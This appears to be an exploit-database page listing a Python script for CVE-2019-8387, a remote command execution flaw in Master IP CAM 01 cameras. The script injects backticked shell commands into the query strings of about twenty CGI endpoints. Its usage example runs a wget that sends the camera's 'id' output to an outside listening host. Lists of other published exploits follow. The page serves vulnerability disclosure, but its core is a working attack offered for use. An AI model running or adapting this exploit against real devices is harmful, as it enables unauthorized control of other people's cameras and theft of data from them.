Search for hundreds of thousands of exploits

"Master IP CAM 01 3.3.4.2103 - Remote Command Execution"

Author

Exploit author

"Raffaele Sabato"

Platform

Exploit platform

cgi

Release date

Exploit published date

2019-02-18

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Exploit Title: Master IP CAM 01 Remote Command Execution
# Date: 09-02-2019
# Remote: Yes
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Master IP CAM
# Version: 3.3.4.2103
# CVE: CVE-2019-8387

import sys
import requests


if len(sys.argv) < 3:
	print "[-] Usage: python MasterIpCamRCE.py <ip> <cmd>"
  	print "[-] Example: python MasterIpCamRCE.py 192.168.1.54 'wget http://192.168.1.55:4444/$(id)'"
  	exit(1)

host = sys.argv[1]
command = sys.argv[2]
page = [
		"bconf.cgi",
		"ddns_start.cgi",
		"getddnsattr.cgi",
		"getinetattr.cgi",
		"getnettype.cgi",
		"getupnp.cgi",
		"getwifiattr.cgi",
		"getwifistatus.cgi",
		"inetconfig.cgi",
		"iptest.cgi",
		"listwifiap.cgi",
		"p2p.cgi",
		"paraconf.cgi",
		"scanwifi.cgi",
		"setadslattr.cgi",
		"setddnsattr.cgi",
		"setinetattr.cgi",
		"setwifiattr.cgi",
		"upnp_start.cgi",
		"wifimode.cgi",
		"wifitest.cgi",
		]
for x in page:
	url = "http://"+host+"/cgi-bin/"+x+"?cmd=`"+command+"`"
	#url = "http://"+host+"/cgi-bin/"+x+"?action=`"+command+"`"
	print "[*] Attack on "+x
	print "[+] Sending the payload"
	r = requests.get(url)
	if r.status_code == 200:
		print "[+] Exploit Success"
		break
Release DateTitleTypePlatformAuthor
2020-07-07"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection"webappsphp"Mehmet Kelepçe"
2020-07-07"Sickbeard 0.1 - Remote Command Injection"webappshardwarebdrake
2020-07-07"Online Shopping Portal 3.1 - 'email' SQL Injection"webappsphpgh1mau
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
2020-07-07"Microsoft Windows mshta.exe 2019 - XML External Entity Injection"remotexmlhyp3rlinx
2020-07-06"Grafana 7.0.1 - Denial of Service (PoC)"doslinuxmostwanted002
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Γ–zeser"
Release DateTitleTypePlatformAuthor
2019-02-18"Master IP CAM 01 3.3.4.2103 - Remote Command Execution"webappscgi"Raffaele Sabato"
2018-05-10"Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery"webappshardware"Raffaele Sabato"
2018-01-26"Dodocool DC38 N300 - Cross-site Request Forgery"webappshardware"Raffaele Sabato"
2018-01-17"Master IP CAM 01 - Multiple Vulnerabilities"remotehardware"Raffaele Sabato"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46400/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.